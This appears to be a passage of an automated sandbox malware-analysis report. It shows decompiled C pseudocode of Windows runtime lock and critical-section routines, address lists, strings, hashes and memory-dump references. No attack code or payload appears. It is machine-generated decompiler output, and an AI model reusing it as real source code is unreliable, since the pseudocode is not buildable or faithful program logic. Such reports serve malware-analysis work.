0x00a6231d
0x00a62320
0x00a62323
0x00a62323
0x00a62328
0x00a6232d
0x00a6232f
0x00a62331
0x00a62336
0x00a62336
0x00a6233b
0x00a6233d
0x00a62350
0x00a62351
0x00a62356
0x00a62359
0x00a62359
0x00a6235b
0x00a6235d
0x00a25367
0x00a2536b
0x00a25372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a62363
0x00a62363
0x00a62369
0x00a6236a
0x00a6236c
0x00a62371
0x00a62373
0x00000000
0x00a62379
0x00a62379
0x00a6237a
0x00a6237f
0x00a6237f
0x00a62385
0x00a62386
0x00a62389
0x00a6238e
0x00a62390
0x00a25378
0x00a2537c
0x00a62396
0x00a62396
0x00a62397
0x00a6239c
0x00a623a2
0x00a623a3
0x00a623a6
0x00a623ab
0x00a623ad
0x00000000
0x00a623b3
0x00a623b3
0x00a623b4
0x00a623b9
0x00a623ba
0x00a623ba
0x00a623bc
0x00a623bf
0x00000000
0x00000000
0x00a59153
0x00a59158
0x00a5915a
0x00a5915e
0x00a59160
0x00000000
0x00a59166
0x00a59166
0x00a59171
0x00a59176
0x00a59176
0x00000000
0x00a59160
0x00a623c6
0x00a623ce
0x00a623d7
0x00a623d7
0x00a623ad
0x00a62390
0x00a62373
0x00a6233f
0x00a6233f
0x00000000
0x00a6233f
0x00a62291
0x00a62291
0x00a62293
0x00a62295
0x00a6229a
0x00a622a1
0x00a622a3
0x00a622a7
0x00a622a9
0x00000000
0x00000000
0x00a622ab
0x00a622ad
0x00a622af
0x00000000
0x00000000
0x00000000
0x00a622af
0x00a622b1
0x00a622b4
0x00a622b4
0x00a622b6
0x00a253be
0x00a253be
0x00a253be
0x00a253c0
0x00000000
0x00000000
0x00a253cb
0x00a253ce
0x00a253d0
0x00a253d4
0x00a253d6
0x00000000
0x00a253d8
0x00a253e3
0x00a253ea
0x00a253ea
0x00000000
0x00a253d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a622b6
0x00000000
0x00a6228f
0x00a62349
0x00a6234d
0x00a62251
0x00a62251
0x00000000
0x00a62251
0x00a621a4
0x00a621a4
0x00a621a6
0x00a621a8
0x00a621ac
0x00a621b6
0x00a621b8
0x00a621bc
0x00a621be
0x00000000
0x00000000
0x00a621c0
0x00a621c2
0x00a621c4
0x00000000
0x00000000
0x00000000
0x00a621c4
0x00a621c6
0x00a621c6
0x00a621c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00a621c8
0x00a621a2
0x00000000
0x00a62183
0x00a4057b
0x00a4057d
0x00a40581
0x00a40583
0x00a62178
0x00000000
0x00a40589
0x00a4058f
0x00a4058f
0x00a40583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A62206

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00A6220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC
RTL: Resource at %p, xrefs: 00A6221D, 00A6230B
RTL: Re-Waiting, xrefs: 00A6223A, 00A62328

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
Instruction ID: f510b12933ad2fa97dbec47dec43746e63c9951263ebfc88f77ee9bb51981f30
Opcode Fuzzy Hash: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
Instruction Fuzzy Hash: EE513776B046016BEB148B28CC81FA633B9AFD8721F218229FD19DF285DA71EC458790

Uniqueness

Uniqueness Score: -1.00%

Function 00A2EC56, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00A2EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00A1DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xae793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A016C0(_t39);
				} else {
					_t40 = E009FF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00A43915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A001A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xae793c; // 0x0
								_push(_t85);
								_t44 = E00A01F28(_t71);
							} else {
								_t44 = E009FF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00A43915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00A82306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00A2EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00A44FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00A53F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00A53F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xae20c0;
								if(_t85 != 0xae20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00A8217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00A53F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x00a2ec56
0x00a2ec56
0x00a2ec56
0x00a2ec5c
0x00a2ec64
0x00a623e6
0x00a623eb
0x00a623eb
0x00a2ec6a
0x00a2ec6c
0x00a2ec6f
0x00a623f3
0x00a623f8
0x00a623fa
0x00a623fc
0x00a2ec75
0x00a2ec76
0x00a2ec76
0x00a2ec7b
0x00a2ec7c
0x00a2ec7e
0x00a62406
0x00a62407
0x00a6240c
0x00a6240d
0x00a6240d
0x00a6240d
0x00a62414
0x00a62417
0x00a6241e
0x00a62435
0x00a62438
0x00a6243c
0x00a6243f
0x00a62442
0x00a62443
0x00a62446
0x00a62449
0x00a62453
0x00a62455
0x00a6245b
0x00a6245b
0x00a2eb99
0x00a2eb99
0x00a2eb9c
0x00a2eb9d
0x00a2eb9f
0x00a2eba2
0x00a62465
0x00a6246b
0x00a6246d
0x00a2eba8
0x00a2eba9
0x00a2eba9
0x00a2ebae
0x00a2ebb3
0x00a2ebb9
0x00a2ebbb
0x00a62513
0x00a62514
0x00a62519
0x00a6251b
0x00a2ec2a
0x00a2ec2d
0x00a2ec33
0x00a2ec36
0x00a2ec3a
0x00a2ec3e
0x00a2ec40
0x00a2ec47
0x00a2ec47
0x00a2ec40
0x00a022c6
0x00a2ebc1
0x00a2ebc1
0x00a2ebc5
0x00a2ec9a
0x00a2ec9a
0x00a2ebd6
0x00a2ebd6
0x00000000
0x00a2ebbb
0x00a62477
0x00a6247c
0x00a62486
0x00a6248b
0x00a62496
0x00a6249b
0x00a6249d
0x00a624a0
0x00a624a3
0x00a624aa
0x00a624aa
0x00a624a5
0x00a624a5
0x00a624a5
0x00a624ac
0x00a624af
0x00a624b0
0x00a624b3
0x00a624b9
0x00a624ba
0x00a624bb
0x00a624c6
0x00a624cb
0x00a624cd
0x00a624d0
0x00a624d1
0x00a624d4
0x00a624d6
0x00a624d9
0x00a624d9
0x00a624dc
0x00a624df
0x00a624e1
0x00a624e7
0x00a624e9
0x00a624ec
0x00a624ef
0x00a624f2
0x00a624f2
0x00a624ef
0x00a624e7
0x00a624fa
0x00a624ff
0x00a62501
0x00a62503
0x00a62506
0x00a6250b
0x00a2eb8c
0x00a2eb93
0x00000000
0x00000000
0x00a2eb93
0x00000000
0x00a2eb99
0x00a2ec85
0x00a2ec85
0x00a2ec85
0x00000000

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A6248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A624BD
LQVlCtrLC3XKy-uMt3evj8_5MWMujx37lq_vO7AI0Bw__kMW8eMJEz6bMOGLiRO_mDTpi8mT8fHjyZMfTZ36ybRpnwQGPp458_GsWZ_OmfPp3Lmfzp__aVjYZ0uXfhYZ-fnq1Z_Hxn4eF_d4zZprkZEH7e2D5kaHtd_uarvdue9W-9532nbf2NP6duuu67vGdI15o-KN17Nefz3t9deTSb2R9MagpEGDNg0avG7I4KjBgyOHDl325rBlw99cPnJEhObI, xrefs: 00A6242A
RTL: Re-Waiting, xrefs: 00A624FA

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LQVlCtrLC3XKy-uMt3evj8_5MWMujx37lq_vO7AI0Bw__kMW8eMJEz6bMOGLiRO_mDTpi8mT8fHjyZMfTZ36ybRpnwQGPp458_GsWZ_OmfPp3Lmfzp__aVjYZ0uXfhYZ-fnq1Z_Hxn4eF_d4zZprkZEH7e2D5kaHtd_uarvdue9W-9532nbf2NP6duuu67vGdI15o-KN17Nefz3t9deTSb2R9MagpEGDNg0avG7I4KjBgyOHDl325rBlw99cPnJEhObI$RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-1060622834
Opcode ID: 122ef88332f2547379f73ea6e2f23b9c6e38580d0721dd097e8405610a630966
Instruction ID: 6973d9136ecc8518d511a44da7530a1c3dfa326f96904a4fd3d274cb99bad66e
Opcode Fuzzy Hash: 122ef88332f2547379f73ea6e2f23b9c6e38580d0721dd097e8405610a630966
Instruction Fuzzy Hash: 44411871600604ABDB20DBA8DD89FAA77B8EF84720F208615F5559B2C1D734ED818760

Uniqueness

Uniqueness Score: -1.00%

Function 00A414C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xae2088; // 0x775879ff
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00A37707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00A413CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A02340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A0E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x00a414c0
0x00a414cb
0x00a414d2
0x00a414d6
0x00a414da
0x00a414de
0x00a414e3
0x00a4157a
0x00a4157a
0x00a414f1
0x00a414f3
0x00a6ea0f
0x00000000
0x00a6ea15
0x00000000
0x00a6ea15
0x00a414f9
0x00a414f9
0x00a414fe
0x00a41504
0x00a6ea1a
0x00a6ea1f
0x00a6ea21
0x00a6ea22
0x00a6ea27
0x00a6ea2a
0x00a6ea2a
0x00a41515
0x00a41517
0x00a4156d
0x00a41572
0x00a41575
0x00a41575
0x00a4151e
0x00a6ea50
0x00a6ea55
0x00a6ea58
0x00a6ea58
0x00a4152e
0x00a41531
0x00a41533
0x00000000
0x00a41535
0x00a41541
0x00a41549
0x00a41549
0x00a41533
0x00a414f3
0x00a41559

APIs

___swprintf_l.LIBCMT ref: 00A6EA22

Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A4146B
Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A41490

___swprintf_l.LIBCMT ref: 00A4156D

Strings

%%%u, xrefs: 00A41564
]:%u, xrefs: 00A6EA47

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
Instruction ID: efdad50921c4c877daf2fb7c32043ae97c7b81124c2e442e3c97a1f6eb79cfab
Opcode Fuzzy Hash: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
Instruction Fuzzy Hash: 2721A576900219ABCF20DF54DD45AEFB3BCBB90700F544555FC5AD3141EB70AA988BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A253A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00A253A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t92);
									_push(0);
									_t37 = E009FF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00A44FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00A8217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A53F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00A43915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00A25384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E009FF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00A43915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00A43915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00A43915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00A25329(_t74, _t92);
													_push(1);
													_t48 = E00A253A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x00a253ab
0x00a253ae
0x00a253b1
0x00a253b4
0x00a253b7
0x00a405b6
0x00a405c0
0x00a405c3
0x00000000
0x00a405c9
0x00a405c9
0x00a405cc
0x00a405d5
0x00a405d5
0x00a253bd
0x00a253bd
0x00a253bd
0x00a253be
0x00a253be
0x00a253be
0x00a253c0
0x00000000
0x00000000
0x00a62269
0x00a6226d
0x00a62349
0x00a6234d
0x00a62273
0x00a62276
0x00a62279
0x00a6227e
0x00a62283
0x00a62287
0x00a6228a
0x00a6228d
0x00a6228f
0x00a622bc
0x00a622bc
0x00a622bc
0x00a622be
0x00a622c4
0x00a622cc
0x00a622d0
0x00a622d6
0x00a622d7
0x00a622da
0x00a622df
0x00a622e4
0x00000000
0x00000000
0x00a622e6
0x00a622e9
0x00a622f4
0x00a622f9
0x00a622fa
0x00a62305
0x00a62314
0x00a62319
0x00a6231a
0x00a6231d
0x00a62320
0x00a62323
0x00a62323
0x00a62328
0x00a6232d
0x00a6232f
0x00a62331
0x00a62336
0x00a62336
0x00a6233b
0x00a6233d
0x00a62350
0x00a62351
0x00a62356
0x00a62359
0x00a62359
0x00a6235b
0x00a6235d
0x00a25367
0x00a2536b
0x00a25372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a62363
0x00a62363
0x00a62369
0x00a6236a
0x00a6236c
0x00a62371
0x00a62373
0x00000000
0x00a62379
0x00a62379
0x00a6237a
0x00a6237f
0x00a6237f
0x00a62385
0x00a62386
0x00a62389
0x00a6238e
0x00a62390
0x00a25378
0x00a2537c
0x00a62396
0x00a62396
0x00a62397
0x00a6239c
0x00a623a2
0x00a623a3
0x00a623a6
0x00a623ab
0x00a623ad
0x00000000
0x00a623b3
0x00a623b3
0x00a623b4
0x00a623b9
0x00a623ba
0x00a623ba
0x00a623bc
0x00a623bf
0x00000000
0x00000000
0x00a59153
0x00a59158
0x00a5915a
0x00a5915e
0x00a59160
0x00000000
0x00a59166
0x00a59166
0x00a59171
0x00a59176
0x00a59176
0x00000000
0x00a59160
0x00a623c6
0x00a623cb
0x00a623ce
0x00a623d7
0x00a623d7
0x00a623ad
0x00a62390
0x00a62373
0x00a6233f
0x00a6233f
0x00000000
0x00a6233f
0x00a62291
0x00a62291
0x00a62293
0x00a62295
0x00a6229a
0x00a622a1
0x00a622a3
0x00a622a7
0x00a622a9
0x00000000
0x00000000
0x00a622ab
0x00a622ad
0x00a622af
0x00000000
0x00000000
0x00000000
0x00a622af
0x00a622b1
0x00a622b4
0x00a622b4
0x00a622b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a622b6
0x00a6228f
0x00000000
0x00a6226d
0x00a253cb
0x00a253ce
0x00a253d0
0x00a253d4
0x00a253d6
0x00000000
0x00a253d8
0x00a253e3
0x00a253ea
0x00a253ea
0x00a253d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A622F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC
RTL: Resource at %p, xrefs: 00A6230B
RTL: Re-Waiting, xrefs: 00A62328

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
Instruction ID: 7d1571415ac6767f3a22ae583c004702df8c3d617255b4f76b8782008896cab5
Opcode Fuzzy Hash: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
Instruction Fuzzy Hash: 36511772A00A156BDF11DB38DC91FA673A8BF98364F104229FD15DF281EA71ED418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
